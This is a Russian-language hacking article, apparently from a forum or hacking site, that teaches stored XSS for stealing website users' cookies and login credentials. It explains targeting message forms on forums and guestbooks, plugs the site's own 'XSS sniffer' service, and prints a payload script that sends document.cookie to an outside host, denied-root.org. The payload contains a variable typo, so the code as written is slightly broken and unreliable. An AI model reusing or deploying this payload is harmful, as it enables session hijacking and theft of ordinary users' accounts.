«Хех!» Довольно часто произносит данную фразу, один из моих товарищей, только что проделавший очередную XSS-атаку. Об этой самой атаке, мы и поговорим в данной статье.
Что такое XSS и с чем его едят? ?
В первую очередь XSS Это атака не на сайт ан на пользователей сайта, если быть чуточку конкретнее, то это атака на служебную информацию сайта (к примеру Coockies). В последнее время было много разговоров о том, нужны кукисы или нет. Да. Они позволяют сохранять сайтам информацию на компьютере пользователя и потом использовать её для предоставления персонализированного содержимого сайта. За частую куки хранят в себе не только разного рода параметров сайта, но и логин пароль жертвы. Так вот эти данные мы и собираемся получить с помощью XSS атаки.
Для реализации этой атаки нужно знание JavaScript, но уже не обязательно! В Интернете есть куча сервисов работающий на XSS, точнее так называемые XSS-снифферы. Один из таких присутствует и на нашем проекте. Клик ми

Обычно атаку проводят на том месте, где есть возможность отправить сообщение, т.е. форумы, гостевые книги, страницы обратной связи и т.д. и т.п. И так, для того, что бы провести атаку нам надо вначале найти уязвимость. Всё что нам нужно узнать о уязвимости, это есть ли там возможность использовать html теги. Для этого. отправим какой-нибудь скрипт, подобный этому: . По идее при обновлении страницы, должно выскочить окно с сообщением “hacked by”, сто скажет на о том сто код обработан и можно приступить к воровству куков.
Для реализации нашей идее мы возьмём ява скрипт с нашего сниффера (<script>mg=new Image();img.src="http://denied-root.org/s.gif?"+document.cookie</script> ) и отправим его в данное поле. После авторизации юзера, передаваемая информация будет просниффана и отправлена вот здесь. Собственно на этом воровство кукоф закончено, нам останется только разобраться в них и «воля» понеслася =)